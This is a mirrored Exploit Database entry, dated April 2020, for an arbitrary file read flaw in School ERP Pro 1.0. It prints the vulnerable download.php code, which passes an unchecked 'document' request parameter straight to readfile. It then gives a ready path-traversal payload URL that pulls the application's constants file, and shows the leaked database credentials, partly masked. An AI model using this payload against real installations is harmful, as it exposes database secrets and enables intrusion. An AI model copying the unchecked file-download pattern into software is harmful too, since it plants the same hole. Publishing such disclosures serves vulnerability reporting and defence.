School ERP Pro 1.0 – Arbitrary File Read

• Exploit Database
• 103 阅读

• 作者： Besim
  日期： 2020-04-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48394/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43

  # Exploit Title: School ERP Pro 1.0 - Arbitrary File Read # Date: 2020-04-28 # Author: Besim ALTINOK # Vendor Homepage: http://arox.in # Software Link: https://sourceforge.net/projects/school-erp-ultimate/ # Version: latest version # Tested on: Xampp # Credit: İsmail BOZKURT # CVE: N/A   Vulnerable code: (/student_staff/download.php) - File Name: download.php - Content of the download.php   <?php if ( isset($_REQUEST["document"])&&$_REQUEST["document"]!="") { $file = $_REQUEST['document']; header("Content-type: application/force-download"); header("Content-Transfer-Encoding: Binary"); header("Content-length: ".filesize($file)); header("Content-disposition: attachment; filename=\"".$file."\""); readfile($file); exit; } ?>   ------------ *Payload:* ---------------   http://localhost/school_erp/student_staff/download.php?document=../includes/constants.inc.php ------------------------ *After run payload: (we accessed of the file content)* ------------------------   <?php   define('DB_SERVER', 'localhost'); define('DB_SERVER_USERNAME', 'aroxi********'); define('DB_SERVER_PASSWORD', 'erp**********'); define('DB_DATABASE', 'aroxi****************'); ?>